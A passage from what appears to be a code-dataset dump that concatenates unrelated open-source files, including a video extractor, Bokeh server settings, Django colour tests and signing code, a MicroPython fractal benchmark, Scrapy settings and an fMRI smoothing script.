'thumbnail': r're:^https?://.*\.jpg$',
'chapter': 'Introduction',
'chapter_number': 1,
},
'params': {
'skip_download': True,
},
'skip': 'Requires FrontendMasters account credentials',
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
course_name, lesson_name = mobj.group('course_name', 'lesson_name')
course = self._download_course(course_name, url)
lesson_id, lesson = next(
(video_id, data)
for video_id, data in course['lessonData'].items()
if data.get('slug') == lesson_name)
chapters = self._extract_chapters(course)
return self._extract_lesson(chapters, lesson_id, lesson)
class FrontendMastersCourseIE(FrontendMastersPageBaseIE):
_VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<id>[^/]+)'
_TEST = {
'url': 'https://frontendmasters.com/courses/web-development/',
'info_dict': {
'id': 'web-development',
'title': 'Introduction to Web Development',
'description': 'md5:9317e6e842098bf725d62360e52d49a6',
},
'playlist_count': 81,
'skip': 'Requires FrontendMasters account credentials',
}
@classmethod
def suitable(cls, url):
return False if FrontendMastersLessonIE.suitable(url) else super(
FrontendMastersBaseIE, cls).suitable(url)
def _real_extract(self, url):
course_name = self._match_id(url)
course = self._download_course(course_name, url)
chapters = self._extract_chapters(course)
lessons = sorted(
course['lessonData'].values(), key=lambda data: data['index'])
entries = []
for lesson in lessons:
lesson_name = lesson.get('slug')
if not lesson_name:
continue
lesson_id = lesson.get('hash') or lesson.get('statsId')
entries.append(self._extract_lesson(chapters, lesson_id, lesson))
title = course.get('title')
description = course.get('description')
return self.playlist_result(entries, course_name, title, description)
|
unlicense
|
rhiever/bokeh
|
bokeh/server/settings.py
|
25
|
3038
|
from __future__ import absolute_import
from os.path import dirname, join
import uuid
import imp
import zmq
from ..settings import settings as bokeh_settings
default_blaze_config = join(dirname(__file__), 'blaze', 'config.py')
_defaults = dict(
ip="0.0.0.0",
port=5006,
url_prefix="",
multi_user=False,
# make scripts for now - for now cli will only
# pass one script
scripts="",
model_backend={'type' : 'shelve'},
# model_backend={'type' : redis, 'redis_port' : 7001, 'start-redis' : True},
# model_backend={'type' : memory},
# model_backend={'type' : shelve},
filter_logs=False,
ws_conn_string=None,
pub_zmqaddr="inproc://bokeh_in",
sub_zmqaddr="inproc://bokeh_out",
debug=False,
dev=False,
splitjs=False,
robust_reload=False,
verbose=False,
run_forwarder=True,
secret_key=str(uuid.uuid4()),
blaze_config=default_blaze_config,
)
class Settings(object):
_debugjs = False
_ctx = None
fields = _defaults.keys()
def reset(self):
for k,v in _defaults.items():
setattr(self, k, v)
@property
def ctx(self):
if self._ctx is None or self._ctx.closed:
self._ctx = zmq.Context()
return self._ctx
@property
def debugjs(self):
return bokeh_settings.debugjs
@debugjs.setter
def debugjs(self, val):
bokeh_settings.debugjs = val
def from_file(self, filename=None):
name = "_bokeh_server_configuration"
mod = imp.load_source(name, filename)
for k in self.fields:
v = getattr(mod, k, None)
if v is not None:
setattr(self, k, v)
self.process_settings()
def from_dict(self, input_dict):
for k,v in input_dict.items():
setattr(self, k, v)
def from_args(self, args):
self.ip = args.ip
self.port = args.port
self.multi_user = args.multi_user
self.model_backend = {'type' : args.backend}
if self.model_backend['type'] == 'redis':
self.model_backend.update({
'redis_port' : args.redis_port,
'start-redis' : args.start_redis
})
self.ws_conn_string = args.ws_conn_string
self.debug = args.debug
self.debugjs = args.debugjs
self.splitjs = args.splitjs
self.robust_reload = args.robust_reload
self.verbose = args.verbose
self.run_forwarder = True
if args.blaze_config is not None:
self.blaze_config = args.blaze_config
if args.script:
self.scripts = [args.script]
if args.url_prefix:
self.url_prefix = args.url_prefix
def process_settings(self):
if self.url_prefix:
if not self.url_prefix.startswith("/"):
self.url_prefix = "/" + self.url_prefix
if self.url_prefix.endswith("/"):
self.url_prefix = self.url_prefix[:-1]
settings = Settings()
settings.reset()
del Settings
|
bsd-3-clause
|
x303597316/hue
|
desktop/core/ext-py/Django-1.6.10/tests/utils_tests/test_termcolors.py
|
60
|
7696
|
from django.utils import unittest
from django.utils.termcolors import (parse_color_setting, PALETTES,
DEFAULT_PALETTE, LIGHT_PALETTE, DARK_PALETTE, NOCOLOR_PALETTE, colorize)
class TermColorTests(unittest.TestCase):
def test_empty_string(self):
self.assertEqual(parse_color_setting(''), PALETTES[DEFAULT_PALETTE])
def test_simple_palette(self):
self.assertEqual(parse_color_setting('light'), PALETTES[LIGHT_PALETTE])
self.assertEqual(parse_color_setting('dark'), PALETTES[DARK_PALETTE])
self.assertEqual(parse_color_setting('nocolor'), None)
def test_fg(self):
self.assertEqual(parse_color_setting('error=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
def test_fg_bg(self):
self.assertEqual(parse_color_setting('error=green/blue'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue'}))
def test_fg_opts(self):
self.assertEqual(parse_color_setting('error=green,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
self.assertEqual(parse_color_setting('error=green,bold,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink','bold')}))
def test_fg_bg_opts(self):
self.assertEqual(parse_color_setting('error=green/blue,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue', 'opts': ('blink',)}))
self.assertEqual(parse_color_setting('error=green/blue,bold,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue', 'opts': ('blink','bold')}))
def test_override_palette(self):
self.assertEqual(parse_color_setting('light;error=green'),
dict(PALETTES[LIGHT_PALETTE],
ERROR={'fg':'green'}))
def test_override_nocolor(self):
self.assertEqual(parse_color_setting('nocolor;error=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg': 'green'}))
def test_reverse_override(self):
self.assertEqual(parse_color_setting('error=green;light'), PALETTES[LIGHT_PALETTE])
def test_multiple_roles(self):
self.assertEqual(parse_color_setting('error=green;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'},
SQL_FIELD={'fg':'blue'}))
def test_override_with_multiple_roles(self):
self.assertEqual(parse_color_setting('light;error=green;sql_field=blue'),
dict(PALETTES[LIGHT_PALETTE],
ERROR={'fg':'green'},
SQL_FIELD={'fg':'blue'}))
def test_empty_definition(self):
self.assertEqual(parse_color_setting(';'), None)
self.assertEqual(parse_color_setting('light;'), PALETTES[LIGHT_PALETTE])
self.assertEqual(parse_color_setting(';;;'), None)
def test_empty_options(self):
self.assertEqual(parse_color_setting('error=green,'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green,,,'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green,,blink,,'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
def test_bad_palette(self):
self.assertEqual(parse_color_setting('unknown'), None)
def test_bad_role(self):
self.assertEqual(parse_color_setting('unknown='), None)
self.assertEqual(parse_color_setting('unknown=green'), None)
self.assertEqual(parse_color_setting('unknown=green;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
SQL_FIELD={'fg':'blue'}))
def test_bad_color(self):
self.assertEqual(parse_color_setting('error='), None)
self.assertEqual(parse_color_setting('error=;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
SQL_FIELD={'fg':'blue'}))
self.assertEqual(parse_color_setting('error=unknown'), None)
self.assertEqual(parse_color_setting('error=unknown;sql_field=blue'),
dict(PALETTES[NOCOLOR_PALETTE],
SQL_FIELD={'fg':'blue'}))
self.assertEqual(parse_color_setting('error=green/unknown'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green/blue/something'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg': 'blue'}))
self.assertEqual(parse_color_setting('error=green/blue/something,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg': 'blue', 'opts': ('blink',)}))
def test_bad_option(self):
self.assertEqual(parse_color_setting('error=green,unknown'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=green,unknown,blink'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
def test_role_case(self):
self.assertEqual(parse_color_setting('ERROR=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('eRrOr=green'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
def test_color_case(self):
self.assertEqual(parse_color_setting('error=GREEN'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=GREEN/BLUE'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue'}))
self.assertEqual(parse_color_setting('error=gReEn'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green'}))
self.assertEqual(parse_color_setting('error=gReEn/bLuE'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'bg':'blue'}))
def test_opts_case(self):
self.assertEqual(parse_color_setting('error=green,BLINK'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
self.assertEqual(parse_color_setting('error=green,bLiNk'),
dict(PALETTES[NOCOLOR_PALETTE],
ERROR={'fg':'green', 'opts': ('blink',)}))
def test_colorize_empty_text(self):
self.assertEqual(colorize(text=None), '\x1b[m\x1b[0m')
self.assertEqual(colorize(text=''), '\x1b[m\x1b[0m')
self.assertEqual(colorize(text=None, opts=('noreset')), '\x1b[m')
self.assertEqual(colorize(text='', opts=('noreset')), '\x1b[m')
|
apache-2.0
|
abiggerhammer/hammer
|
src/bindings/python/setup.py
|
7
|
1281
|
#!/usr/bin/env python
"""
setup.py for Hammer bindings
"""
import os, os.path, sys
from distutils.core import setup, Extension
invoked = os.getcwd()
if (os.path.dirname(sys.argv[0]) != ''):
os.chdir(os.path.dirname(sys.argv[0]))
setup(name="hammer",
version="0.9.0",
author="Upstanding Hackers, LLC",
author_email="[email protected]",
url="https://github.com/UpstandingHackers/hammer",
description="""The Hammer parser combinator library""",
ext_modules=[Extension('_hammer', ['hammer.i'],
swig_opts=['-DHAMMER_INTERNAL__NO_STDARG_H',
'-I../../'],
define_macros=[('SWIG', None)],
depends=['allocator.h',
'glue.h',
'hammer.h',
'internal.h',],
extra_compile_args=['-fPIC',
'-std=gnu99',],
include_dirs=['../../'],
library_dirs=['../../'],
libraries=['hammer'],)],
py_modules=['hammer'],
)
os.chdir(invoked)
|
gpl-2.0
|
micropython/micropython
|
tests/perf_bench/bm_chaos.py
|
15
|
9247
|
# Source: https://github.com/python/pyperformance
# License: MIT
# create chaosgame-like fractals
# Copyright (C) 2005 Carl Friedrich Bolz
import math
import random
class GVector(object):
def __init__(self, x=0, y=0, z=0):
self.x = x
self.y = y
self.z = z
def Mag(self):
return math.sqrt(self.x ** 2 + self.y ** 2 + self.z ** 2)
def dist(self, other):
return math.sqrt(
(self.x - other.x) ** 2 + (self.y - other.y) ** 2 + (self.z - other.z) ** 2
)
def __add__(self, other):
if not isinstance(other, GVector):
raise ValueError("Can't add GVector to " + str(type(other)))
v = GVector(self.x + other.x, self.y + other.y, self.z + other.z)
return v
def __sub__(self, other):
return self + other * -1
def __mul__(self, other):
v = GVector(self.x * other, self.y * other, self.z * other)
return v
__rmul__ = __mul__
def linear_combination(self, other, l1, l2=None):
if l2 is None:
l2 = 1 - l1
v = GVector(
self.x * l1 + other.x * l2, self.y * l1 + other.y * l2, self.z * l1 + other.z * l2
)
return v
def __str__(self):
return "<%f, %f, %f>" % (self.x, self.y, self.z)
def __repr__(self):
return "GVector(%f, %f, %f)" % (self.x, self.y, self.z)
class Spline(object):
"""Class for representing B-Splines and NURBS of arbitrary degree"""
def __init__(self, points, degree, knots):
"""Creates a Spline.
points is a list of GVector, degree is the degree of the Spline.
"""
if len(points) > len(knots) - degree + 1:
raise ValueError("too many control points")
elif len(points) < len(knots) - degree + 1:
raise ValueError("not enough control points")
last = knots[0]
for cur in knots[1:]:
if cur < last:
raise ValueError("knots not strictly increasing")
last = cur
self.knots = knots
self.points = points
self.degree = degree
def GetDomain(self):
"""Returns the domain of the B-Spline"""
return (self.knots[self.degree - 1], self.knots[len(self.knots) - self.degree])
def __call__(self, u):
"""Calculates a point of the B-Spline using de Boors Algorithm"""
dom = self.GetDomain()
if u < dom[0] or u > dom[1]:
raise ValueError("Function value not in domain")
if u == dom[0]:
return self.points[0]
if u == dom[1]:
return self.points[-1]
I = self.GetIndex(u)
d = [self.points[I - self.degree + 1 + ii] for ii in range(self.degree + 1)]
U = self.knots
for ik in range(1, self.degree + 1):
for ii in range(I - self.degree + ik + 1, I + 2):
ua = U[ii + self.degree - ik]
ub = U[ii - 1]
co1 = (ua - u) / (ua - ub)
co2 = (u - ub) / (ua - ub)
index = ii - I + self.degree - ik - 1
d[index] = d[index].linear_combination(d[index + 1], co1, co2)
return d[0]
def GetIndex(self, u):
dom = self.GetDomain()
for ii in range(self.degree - 1, len(self.knots) - self.degree):
if u >= self.knots[ii] and u < self.knots[ii + 1]:
I = ii
break
else:
I = dom[1] - 1
return I
def __len__(self):
return len(self.points)
def __repr__(self):
return "Spline(%r, %r, %r)" % (self.points, self.degree, self.knots)
def write_ppm(im, w, h, filename):
with open(filename, "wb") as f:
f.write(b"P6\n%i %i\n255\n" % (w, h))
for j in range(h):
for i in range(w):
val = im[j * w + i]
c = val * 255
f.write(b"%c%c%c" % (c, c, c))
class Chaosgame(object):
def __init__(self, splines, thickness, subdivs):
self.splines = splines
self.thickness = thickness
self.minx = min([p.x for spl in splines for p in spl.points])
self.miny = min([p.y for spl in splines for p in spl.points])
self.maxx = max([p.x for spl in splines for p in spl.points])
self.maxy = max([p.y for spl in splines for p in spl.points])
self.height = self.maxy - self.miny
self.width = self.maxx - self.minx
self.num_trafos = []
maxlength = thickness * self.width / self.height
for spl in splines:
length = 0
curr = spl(0)
for i in range(1, subdivs + 1):
last = curr
t = 1 / subdivs * i
curr = spl(t)
length += curr.dist(last)
self.num_trafos.append(max(1, int(length / maxlength * 1.5)))
self.num_total = sum(self.num_trafos)
def get_random_trafo(self):
r = random.randrange(int(self.num_total) + 1)
l = 0
for i in range(len(self.num_trafos)):
if r >= l and r < l + self.num_trafos[i]:
return i, random.randrange(self.num_trafos[i])
l += self.num_trafos[i]
return len(self.num_trafos) - 1, random.randrange(self.num_trafos[-1])
def transform_point(self, point, trafo=None):
x = (point.x - self.minx) / self.width
y = (point.y - self.miny) / self.height
if trafo is None:
trafo = self.get_random_trafo()
start, end = self.splines[trafo[0]].GetDomain()
length = end - start
seg_length = length / self.num_trafos[trafo[0]]
t = start + seg_length * trafo[1] + seg_length * x
basepoint = self.splines[trafo[0]](t)
if t + 1 / 50000 > end:
neighbour = self.splines[trafo[0]](t - 1 / 50000)
derivative = neighbour - basepoint
else:
neighbour = self.splines[trafo[0]](t + 1 / 50000)
derivative = basepoint - neighbour
if derivative.Mag() != 0:
basepoint.x += derivative.y / derivative.Mag() * (y - 0.5) * self.thickness
basepoint.y += -derivative.x / derivative.Mag() * (y - 0.5) * self.thickness
else:
# can happen, especially with single precision float
pass
self.truncate(basepoint)
return basepoint
def truncate(self, point):
if point.x >= self.maxx:
point.x = self.maxx
if point.y >= self.maxy:
point.y = self.maxy
if point.x < self.minx:
point.x = self.minx
if point.y < self.miny:
point.y = self.miny
def create_image_chaos(self, w, h, iterations, rng_seed):
# Always use the same sequence of random numbers
        # to get a reproducible benchmark
random.seed(rng_seed)
im = bytearray(w * h)
point = GVector((self.maxx + self.minx) / 2, (self.maxy + self.miny) / 2, 0)
for _ in range(iterations):
point = self.transform_point(point)
x = (point.x - self.minx) / self.width * w
y = (point.y - self.miny) / self.height * h
x = int(x)
y = int(y)
if x == w:
x -= 1
if y == h:
y -= 1
im[(h - y - 1) * w + x] = 1
return im
###########################################################################
# Benchmark interface
bm_params = {
(100, 50): (0.25, 100, 50, 50, 50, 1234),
(1000, 1000): (0.25, 200, 400, 400, 1000, 1234),
(5000, 1000): (0.25, 400, 500, 500, 7000, 1234),
}
def bm_setup(params):
splines = [
Spline(
[
GVector(1.597, 3.304, 0.0),
GVector(1.576, 4.123, 0.0),
GVector(1.313, 5.288, 0.0),
GVector(1.619, 5.330, 0.0),
GVector(2.890, 5.503, 0.0),
GVector(2.373, 4.382, 0.0),
GVector(1.662, 4.360, 0.0),
],
3,
[0, 0, 0, 1, 1, 1, 2, 2, 2],
),
Spline(
[
GVector(2.805, 4.017, 0.0),
GVector(2.551, 3.525, 0.0),
GVector(1.979, 2.620, 0.0),
GVector(1.979, 2.620, 0.0),
],
3,
[0, 0, 0, 1, 1, 1],
),
Spline(
[
GVector(2.002, 4.011, 0.0),
GVector(2.335, 3.313, 0.0),
GVector(2.367, 3.233, 0.0),
GVector(2.367, 3.233, 0.0),
],
3,
[0, 0, 0, 1, 1, 1],
),
]
chaos = Chaosgame(splines, params[0], params[1])
image = None
def run():
nonlocal image
_, _, width, height, iter, rng_seed = params
image = chaos.create_image_chaos(width, height, iter, rng_seed)
def result():
norm = params[4]
# Images are not the same when floating point behaviour is different,
# so return percentage of pixels that are set (rounded to int).
# write_ppm(image, params[2], params[3], 'out-.ppm')
pix = int(100 * sum(image) / len(image))
return norm, pix
return run, result
|
mit
|
sestrella/ansible
|
lib/ansible/modules/windows/win_webpicmd.py
|
52
|
1398
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Peter Mounce <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_webpicmd
version_added: "2.0"
short_description: Installs packages using Web Platform Installer command-line
description:
- Installs packages using Web Platform Installer command-line
(U(http://www.iis.net/learn/install/web-platform-installer/web-platform-installer-v4-command-line-webpicmdexe-rtw-release)).
    - Must be installed and present in PATH (see M(win_chocolatey) module; 'webpicmd' is the package name, and you must install 'lessmsi' first too).
- Install IIS first (see M(win_feature) module).
notes:
    - Accepts EULAs and suppresses reboot - you will need to check and manage reboots yourself (see M(win_reboot) module)
options:
name:
description:
- Name of the package to be installed.
type: str
required: yes
seealso:
- module: win_package
author:
- Peter Mounce (@petemounce)
'''
EXAMPLES = r'''
- name: Install URLRewrite2.
win_webpicmd:
name: URLRewrite2
'''
|
gpl-3.0
|
joseluisfdezbueno/proyecto_py
|
spyder_osl/spyder_osl/settings.py
|
2
|
3020
|
# -*- coding: utf-8 -*-
# Scrapy settings for spyder_osl project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'spyder_osl'
SPIDER_MODULES = ['spyder_osl.spiders']
NEWSPIDER_MODULE = 'spyder_osl.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'spyder_osl (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'spyder_osl.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'spyder_osl.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'spyder_osl.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
|
gpl-2.0
|
cxmo/project-beta
|
code/dataprep_script.py
|
4
|
1758
|
""" The following script will apply a 3mm Gaussian filter on all the data spatially
and will save each smoothed run into the data folder as 'smoothed_run_i', where
0 <= i <= 7 is the index of the run.
"""
#Import libraries
import numpy as np
import scipy
import scipy.ndimage
from scipy.ndimage.filters import gaussian_filter
import nibabel as nb
import matplotlib.pyplot as plt
import utils.data_loading as dl
#All file strings corresponding to BOLD data for subject 4
files = ['../data/task001_run001.bold_dico.nii.gz', '../data/task001_run002.bold_dico.nii.gz',
'../data/task001_run003.bold_dico.nii.gz', '../data/task001_run004.bold_dico.nii.gz',
'../data/task001_run005.bold_dico.nii.gz', '../data/task001_run006.bold_dico.nii.gz',
'../data/task001_run007.bold_dico.nii.gz', '../data/task001_run008.bold_dico.nii.gz']
all_data = []
for index, filename in enumerate(files):
new_data = dl.load_data(filename) #load_data function drops first 4 for us
num_vols = new_data.shape[-1]
if index != 0 and index != 7:
new_num_vols = num_vols - 4
new_data = new_data[:,:,:,:new_num_vols] #Drop last 4 volumes for middle runs
all_data.append(new_data)
#Create an array of all smoothed data
for index, run in enumerate(all_data):
num_vols = np.shape(run)[-1]
run_i_smoothed = []
for time in range(num_vols):
smoothed = dl.smooth_gauss(run, 3, time)
smoothed.shape = (132, 175, 48, 1)
run_i_smoothed.append(smoothed)
run_i_smoothed = np.concatenate(run_i_smoothed, axis = 3)
np.save('../data/smoothed_run_' + str(index), run_i_smoothed) #save in data folder
    print('finished run ' + str(index))
run_i_smoothed = None #Save memory space
|
bsd-3-clause
|
utarsuno/urbtek
|
code_manager/miscellaneous_scripts/formatting.py
|
1
|
2795
|
# coding=utf-8
"""
This module, formatting.py, provides utility functions to format source code text.
"""
# This is needed for the custom compiler.
KEYWORDS = []
def sort_by_deliminator(deliminator, code_text, lines_to_ignore=None):
"""This method will take a chunk of code and format it so that it is sorted by column alignment as well.
:param deliminator: The character that will be used as the center piece.
:param code_text: The chunk of code to format.
:param lines_to_ignore: Any lines that should not be formatted or considered for the formatting standards.
:return: The code text returned back formatted, as a String.
"""
    if code_text == '':
return ''
code_text_as_lines = code_text.split('\n')
temp_list = []
if lines_to_ignore is not None:
current_line = 0
while current_line < len(code_text_as_lines):
if current_line not in lines_to_ignore:
temp_list.append(code_text_as_lines[current_line])
current_line += 1
code_text_as_lines = temp_list
if code_text_as_lines[len(code_text_as_lines) - 1] == '':
code_text_as_lines = code_text_as_lines[0:len(code_text_as_lines) - 1]
longest_deliminator_position = -1
for line in code_text_as_lines:
if line.find(deliminator) > longest_deliminator_position:
longest_deliminator_position = line.find(deliminator)
text = ''
for line in code_text_as_lines:
first_half = line[0:line.find(deliminator)]
if line.find(deliminator) < longest_deliminator_position:
counter = 0
while counter < longest_deliminator_position - line.find(deliminator):
first_half += ' '
counter += 1
second_half = line[line.find(deliminator):len(line)]
text += first_half + second_half + '\n'
if lines_to_ignore is not None:
current_line = 0
current_line_index_from_formatted_text = 0
final_text = ''
split_text = text.split('\n')
if split_text[len(split_text) - 1] == '':
split_text = split_text[0:len(split_text) - 1]
while current_line < len(split_text) + len(lines_to_ignore):
if current_line not in lines_to_ignore:
final_text += text.split('\n')[current_line_index_from_formatted_text] + '\n'
current_line_index_from_formatted_text += 1
else:
final_text += code_text.split('\n')[current_line] + '\n'
current_line += 1
text = final_text
return text
def sort_by_two_deliminators(d0, d1, tts):
"""Just a utility function that calls the single deliminator method twice.
:param d0: first_deliminator_string {sorted for this first}
:param d1: second_deliminator_string {sorted for this second}
:param tts: The text to base the new transformed text off of.
:return: A string representing the text passed in to have two deliminators applied to them.
"""
local_text = tts
local_text = sort_by_deliminator(d0, local_text)
return sort_by_deliminator(d1, local_text)
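# Illustrative usage sketch (not part of the original module): aligning two
# assignments on '=' pads the shorter left-hand side so the '=' columns match.
#
#   src = "x = 1\nlonger_name = 2\n"
#   print(sort_by_deliminator('=', src))
#   # x           = 1
#   # longer_name = 2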
|
apache-2.0
|
egoid/baytree
|
lib/python2.7/site-packages/django/core/signing.py
|
115
|
7060
|
"""
Functions for creating and restoring url-safe signed JSON objects.
The format used looks like this:
>>> signing.dumps("hello")
'ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk'
There are two components here, separated by a ':'. The first component is a
URLsafe base64 encoded JSON of the object passed to dumps(). The second
component is a base64 encoded hmac/SHA1 hash of "$first_component:$secret"
signing.loads(s) checks the signature and returns the deserialized object.
If the signature fails, a BadSignature exception is raised.
>>> signing.loads("ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk")
u'hello'
>>> signing.loads("ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk-modified")
...
BadSignature: Signature failed: ImhlbGxvIg:1QaUZC:YIye-ze3TTx7gtSv422nZA4sgmk-modified
You can optionally compress the JSON prior to base64 encoding it to save
space, using the compress=True argument. This checks if compression actually
helps and only applies compression if the result is a shorter string:
>>> signing.dumps(range(1, 20), compress=True)
'.eJwFwcERACAIwLCF-rCiILN47r-GyZVJsNgkxaFxoDgxcOHGxMKD_T7vhAml:1QaUaL:BA0thEZrp4FQVXIXuOvYJtLJSrQ'
The fact that the string is compressed is signalled by the prefixed '.' at the
start of the base64 JSON.
There are 65 url-safe characters: the 64 used by url-safe base64 and the ':'.
These functions make use of all of them.
"""
from __future__ import unicode_literals
import base64
import datetime
import json
import re
import time
import zlib
from django.conf import settings
from django.utils import baseconv
from django.utils.crypto import constant_time_compare, salted_hmac
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.module_loading import import_string
_SEP_UNSAFE = re.compile(r'^[A-z0-9-_=]*$')
class BadSignature(Exception):
"""
Signature does not match
"""
pass
class SignatureExpired(BadSignature):
"""
Signature timestamp is older than required max_age
"""
pass
def b64_encode(s):
return base64.urlsafe_b64encode(s).strip(b'=')
def b64_decode(s):
pad = b'=' * (-len(s) % 4)
return base64.urlsafe_b64decode(s + pad)
def base64_hmac(salt, value, key):
return b64_encode(salted_hmac(salt, value, key).digest())
def get_cookie_signer(salt='django.core.signing.get_cookie_signer'):
Signer = import_string(settings.SIGNING_BACKEND)
key = force_bytes(settings.SECRET_KEY)
return Signer(b'django.http.cookies' + key, salt=salt)
class JSONSerializer(object):
"""
Simple wrapper around json to be used in signing.dumps and
signing.loads.
"""
def dumps(self, obj):
return json.dumps(obj, separators=(',', ':')).encode('latin-1')
def loads(self, data):
return json.loads(data.decode('latin-1'))
def dumps(obj, key=None, salt='django.core.signing', serializer=JSONSerializer, compress=False):
"""
Returns URL-safe, sha1 signed base64 compressed JSON string. If key is
None, settings.SECRET_KEY is used instead.
If compress is True (not the default) checks if compressing using zlib can
save some space. Prepends a '.' to signify compression. This is included
in the signature, to protect against zip bombs.
Salt can be used to namespace the hash, so that a signed string is
only valid for a given namespace. Leaving this at the default
value or re-using a salt value across different parts of your
application without good cause is a security risk.
The serializer is expected to return a bytestring.
"""
data = serializer().dumps(obj)
# Flag for if it's been compressed or not
is_compressed = False
if compress:
# Avoid zlib dependency unless compress is being used
compressed = zlib.compress(data)
if len(compressed) < (len(data) - 1):
data = compressed
is_compressed = True
base64d = b64_encode(data)
if is_compressed:
base64d = b'.' + base64d
return TimestampSigner(key, salt=salt).sign(base64d)
def loads(s, key=None, salt='django.core.signing', serializer=JSONSerializer, max_age=None):
"""
Reverse of dumps(), raises BadSignature if signature fails.
The serializer is expected to accept a bytestring.
"""
# TimestampSigner.unsign always returns unicode but base64 and zlib
# compression operate on bytes.
base64d = force_bytes(TimestampSigner(key, salt=salt).unsign(s, max_age=max_age))
decompress = False
if base64d[:1] == b'.':
# It's compressed; uncompress it first
base64d = base64d[1:]
decompress = True
data = b64_decode(base64d)
if decompress:
data = zlib.decompress(data)
return serializer().loads(data)
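# Minimal round-trip sketch (illustrative; the salt string is made up, and a
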